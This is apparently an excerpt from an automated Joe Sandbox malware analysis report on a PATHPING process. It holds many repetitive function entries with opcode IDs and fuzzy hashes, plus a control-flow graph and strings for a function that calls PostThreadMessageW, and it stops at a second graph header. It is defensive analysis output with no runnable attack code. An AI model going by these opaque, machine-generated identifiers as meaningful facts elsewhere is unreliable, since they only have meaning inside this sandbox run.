                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 31f0cf63116419844e0e751b788369c48a9393894fe5e92d5e943f23db598969
                                                                                                                        • Instruction ID: d94f12cdf90cc4e25b7d8c9e7a978798cd347fe4ea3362fdaa37e4254044a627
                                                                                                                        • Opcode Fuzzy Hash: 31f0cf63116419844e0e751b788369c48a9393894fe5e92d5e943f23db598969
                                                                                                                        • Instruction Fuzzy Hash: AB90023120544C42E940B5584404A46001987D1305F55C012A0068794E97658E55B665
                                                                                                                        Function 03682BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: afbfe2f75270d596fbb847c98adc2da5d9e8e191932c1614c8ed8ed2e7474b76
                                                                                                                        • Instruction ID: 802d95b0f44b659b8de8b6900517452371486d17124c5d1b70cf31dc6c575cc2
                                                                                                                        • Opcode Fuzzy Hash: afbfe2f75270d596fbb847c98adc2da5d9e8e191932c1614c8ed8ed2e7474b76
                                                                                                                        • Instruction Fuzzy Hash: FC90023120140C02E980B558440464A000987D2301F95C016A0029754ECB558B5977A5
                                                                                                                        Function 03682BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 5014df5e9208bbd66b54feb68e67b0483c8a78c6bcb4e884e83f9bd54f682ae8
                                                                                                                        • Instruction ID: cbed2ddcb287dea1f14f39d55487861fcf9940915773a5a38b76ae5db55abe30
                                                                                                                        • Opcode Fuzzy Hash: 5014df5e9208bbd66b54feb68e67b0483c8a78c6bcb4e884e83f9bd54f682ae8
                                                                                                                        • Instruction Fuzzy Hash: 2D90023160540C02E950B5584414746000987D1301F55C012A0028754E87958B5576A5
                                                                                                                        Function 03682AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 79005ad2b962086256d65cb1a92c6864909684d0bcfade882a7f4011a4c9bea4
                                                                                                                        • Instruction ID: dfa75e14c6c5221d294560dc607d3377d0b5d3693635ff924af8f14a283d40a1
                                                                                                                        • Opcode Fuzzy Hash: 79005ad2b962086256d65cb1a92c6864909684d0bcfade882a7f4011a4c9bea4
                                                                                                                        • Instruction Fuzzy Hash: A8900225221404021945F958060450B044997D7351395C016F141A690DC76189655325
                                                                                                                        Function 03682AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 814d4d3d24709397858e58c253b1f455d2d8495d208f0e3260d955fe7809de40
                                                                                                                        • Instruction ID: d4181551f0df19b999fe65b7faadf99bba517073f0222f0b143fe26925896b73
                                                                                                                        • Opcode Fuzzy Hash: 814d4d3d24709397858e58c253b1f455d2d8495d208f0e3260d955fe7809de40
                                                                                                                        • Instruction Fuzzy Hash: 4C900225211404031905F9580704507004A87D6351355C022F1019650DD76189615125
                                                                                                                        Function 03682F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: af27fd7529c510e6c533891acca74967bfecadd695f11e6f0a56e9760cec309a
                                                                                                                        • Instruction ID: 74adbf7348f65c458ceb84eb66b6eebd94c5c1b41b2c261fa9bcd3fa7b93769f
                                                                                                                        • Opcode Fuzzy Hash: af27fd7529c510e6c533891acca74967bfecadd695f11e6f0a56e9760cec309a
                                                                                                                        • Instruction Fuzzy Hash: C890026134140842E900B5584414B060009C7E2301F55C016E1068654E8759CD52612A
                                                                                                                        Function 03682FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8c0ef5f125197de70b1fd2dd8d441c45200a0e81620f3dcacd44ac9635eb541c
                                                                                                                        • Instruction ID: e0d487eaf5e48d47f2e411b0ee0d709ded21995f7f436d1c60de1ab48047eb1b
                                                                                                                        • Opcode Fuzzy Hash: 8c0ef5f125197de70b1fd2dd8d441c45200a0e81620f3dcacd44ac9635eb541c
                                                                                                                        • Instruction Fuzzy Hash: 22900221211C0442EA00B9684C14B07000987D1303F55C116A0158654DCA5589615525
                                                                                                                        Function 03682FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: db3dd293f046817568c1d761e82539d8094fe6ae8ac11185e154843785795968
                                                                                                                        • Instruction ID: e4391b10146941e560c46e81b87288b0ffe02e20b2001129524b9ddf8edd68b6
                                                                                                                        • Opcode Fuzzy Hash: db3dd293f046817568c1d761e82539d8094fe6ae8ac11185e154843785795968
                                                                                                                        • Instruction Fuzzy Hash: AC900221601404425940B56888449064009ABE2211755C122A099C650E869989655669
                                                                                                                        Function 03682EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 950c3adcb457fcf272feaf18a3b4c73e72e4b11e537ef0ea3498b239d0a0c6c5
                                                                                                                        • Instruction ID: c35dac88a46dc2099aa184645ccdd9076d3b4538e509d6f9fc5119690a963ddf
                                                                                                                        • Opcode Fuzzy Hash: 950c3adcb457fcf272feaf18a3b4c73e72e4b11e537ef0ea3498b239d0a0c6c5
                                                                                                                        • Instruction Fuzzy Hash: AC90026120180803E940B9584804607000987D1302F55C012A2068655F8B698D516139
                                                                                                                        Function 03682E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 49ba85e7a69da281505c3194e27b0f3bdb938aaadfdb8f3b9037f1a85a934f14
                                                                                                                        • Instruction ID: 47d2f5029651fb173e90453441466880c4e9949d191e67a620e0f2109b838b51
                                                                                                                        • Opcode Fuzzy Hash: 49ba85e7a69da281505c3194e27b0f3bdb938aaadfdb8f3b9037f1a85a934f14
                                                                                                                        • Instruction Fuzzy Hash: 9290022160140902E901B5584404616000E87D1241F95C023A1028655FCB658A92A135
                                                                                                                        Function 03682D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 164638e7d8d8737d5e06541ab0579a7e18433fa468101770e85f9e222f83c558
                                                                                                                        • Instruction ID: 2b4c97a877fa3b6126a73cfcb63fec0c949d1a1435c21811c4f71de8fa2d06cb
                                                                                                                        • Opcode Fuzzy Hash: 164638e7d8d8737d5e06541ab0579a7e18433fa468101770e85f9e222f83c558
                                                                                                                        • Instruction Fuzzy Hash: 1390022130140403E940B55854186064009D7E2301F55D012E0418654DDA5589565226
                                                                                                                        Function 03682D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: eb52eaf7df66be00750827f46d10b71ebe6a361d58a9d84d22b3d27152243a23
                                                                                                                        • Instruction ID: 51bd7443822bc9dce8e46ce00591ffbe425c834a609527f36754de5b680014a6
                                                                                                                        • Opcode Fuzzy Hash: eb52eaf7df66be00750827f46d10b71ebe6a361d58a9d84d22b3d27152243a23
                                                                                                                        • Instruction Fuzzy Hash: B290022921340402E980B558540860A000987D2202F95D416A0019658DCA5589695325
                                                                                                                        Function 03682DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ef576fb73a83951f1ba09a73ef6e346e1bf39acb7c985d075f7b3f6189d08c31
                                                                                                                        • Instruction ID: c851b81d59ed0aeae6ae41eb6b6b9d84b76bc2206e3dec543b30a8cea5f6c9b5
                                                                                                                        • Opcode Fuzzy Hash: ef576fb73a83951f1ba09a73ef6e346e1bf39acb7c985d075f7b3f6189d08c31
                                                                                                                        • Instruction Fuzzy Hash: 5490023120140813E911B5584504707000D87D1241F95C413A0428658E97968A52A125
                                                                                                                        Function 03682DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1c87d09e10f1190e00fe328c7d32dbbf2a67794908928288670d8b651dca352d
                                                                                                                        • Instruction ID: c305e12d5b3b157373209cdcf9fa496d72bac9accb070c11e02fca453ea67e5e
                                                                                                                        • Opcode Fuzzy Hash: 1c87d09e10f1190e00fe328c7d32dbbf2a67794908928288670d8b651dca352d
                                                                                                                        • Instruction Fuzzy Hash: 00900221242445526D45F5584404507400A97E1241795C013A1418A50D86669956D625
                                                                                                                        Function 03682C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1858e9901c01563f68fb150c652809530b43e0ba8aa373a7f2fbe2b5ced0e88d
                                                                                                                        • Instruction ID: defda8086d55ea8989f0798e2c6852a1a2e322889d4ba8a2d19009d350acf663
                                                                                                                        • Opcode Fuzzy Hash: 1858e9901c01563f68fb150c652809530b43e0ba8aa373a7f2fbe2b5ced0e88d
                                                                                                                        • Instruction Fuzzy Hash: F090023120140C42E900B5584404B46000987E1301F55C017A0128754E8755C9517525
                                                                                                                        Function 03682C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 57fbe547ba18721fdcdb592f04a8de349b464be837b3211fbd9955eca9e613a5
                                                                                                                        • Instruction ID: c2f47769c6ef736f8675c3a20a1c61b12eee5a96cb290dd2538924f652318ae4
                                                                                                                        • Opcode Fuzzy Hash: 57fbe547ba18721fdcdb592f04a8de349b464be837b3211fbd9955eca9e613a5
                                                                                                                        • Instruction Fuzzy Hash: 3990023120148C02E910B558840474A000987D1301F59C412A4428758E87D589917125
                                                                                                                        Function 03682CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8ab95c668f2a637c063d695a087d35679f490615777d0187d468a3e96b4612e0
                                                                                                                        • Instruction ID: 3b27f6ccb5de8f92f93432533a767788b32c3612d2bfa84bd5f9629b51a3add3
                                                                                                                        • Opcode Fuzzy Hash: 8ab95c668f2a637c063d695a087d35679f490615777d0187d468a3e96b4612e0
                                                                                                                        • Instruction Fuzzy Hash: 0990023120140802E900B9985408646000987E1301F55D012A5028655FC7A589916135
                                                                                                                        Function 036835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: ad1f612c192bba10b3ef262b00caebc41a13d91863ee0d7f6e18328f3c79da5c
                                                                                                                        • Instruction ID: f350f17990829052df7cc15c77ee41e7e722fa8bd47d8bf50d9290ccedc6230e
                                                                                                                        • Opcode Fuzzy Hash: ad1f612c192bba10b3ef262b00caebc41a13d91863ee0d7f6e18328f3c79da5c
                                                                                                                        • Instruction Fuzzy Hash: 5790023160550802E900B5584514706100987D1201F65C412A0428668E87D58A5165A6
                                                                                                                        Function 036839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: a5a5dba22e8e4986c794ddffb3feac453506210cc7a1632ae38db727ca5faacb
                                                                                                                        • Instruction ID: 3b9376ac53e2a7fec80fd50a7d29b64144b35e26b4c949b732f2729b00e55140
                                                                                                                        • Opcode Fuzzy Hash: a5a5dba22e8e4986c794ddffb3feac453506210cc7a1632ae38db727ca5faacb
                                                                                                                        • Instruction Fuzzy Hash: 4490022124545502E950B55C44046164009A7E1201F55C022A0818694E869589556225
                                                                                                                        Function 02BB0810 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 299 2bb0810-2bb082b 302 2bb07bb-2bb07c5 299->302 303 2bb082d-2bb083c 299->303 306 2bb07de-2bb07f2 call 2bb0450 302->306 307 2bb07c7-2bb07dc call 2bb03c0 302->307 304 2bb083e-2bb0843 303->304 305 2bb07f3 303->305 309 2bb08b2 304->309 310 2bb08b6-2bb08c1 304->310 306->305 307->306 315 2bb0760-2bb079a call 2bcb050 call 2bcb660 call 2bc1730 307->315 309->310 313 2bb08c3-2bb08d3 310->313 313->309 316 2bb08d5-2bb08fe 313->316 315->307 332 2bb079c-2bb07a2 315->332 316->313 319 2bb0900-2bb0923 316->319 323 2bb0999 319->323 324 2bb0925-2bb093a 319->324 327 2bb09b2-2bb0a1a call 2bcb0a0 call 2bcbab0 call 2bb40f0 call 2ba1410 call 2bc1790 323->327 326 2bb093c-2bb093d 324->326 324->327 349 2bb0a3a-2bb0a40 327->349 350 2bb0a1c-2bb0a2b PostThreadMessageW 327->350 334 2bb07f4-2bb07f7 332->334 335 2bb07a4-2bb07c5 call 2bc4d70 332->335 334->307 338 2bb07f9-2bb080d call 2bc6830 334->338 335->306 335->307 338->307 350->349 351 2bb0a2d-2bb0a37 350->351 351->349
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6276$6276I39$6276I39$I39
                                                                                                                        • API String ID: 0-1925500867
                                                                                                                        • Opcode ID: 233270d570d008393e1c505907303da5b8353bc156a2c31c4a26afd7d313d161
                                                                                                                        • Instruction ID: a5a73287a21cff2724d90274cb017d40092f01b8be3ff5fc3220492b734160f4
                                                                                                                        • Opcode Fuzzy Hash: 233270d570d008393e1c505907303da5b8353bc156a2c31c4a26afd7d313d161
                                                                                                                        • Instruction Fuzzy Hash: AD51A07290021D7FDB22AA748C419FFBBBCEF45268F044AE9E911A7141DB619D06CBD1
                                                                                                                        Function 02BB093F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
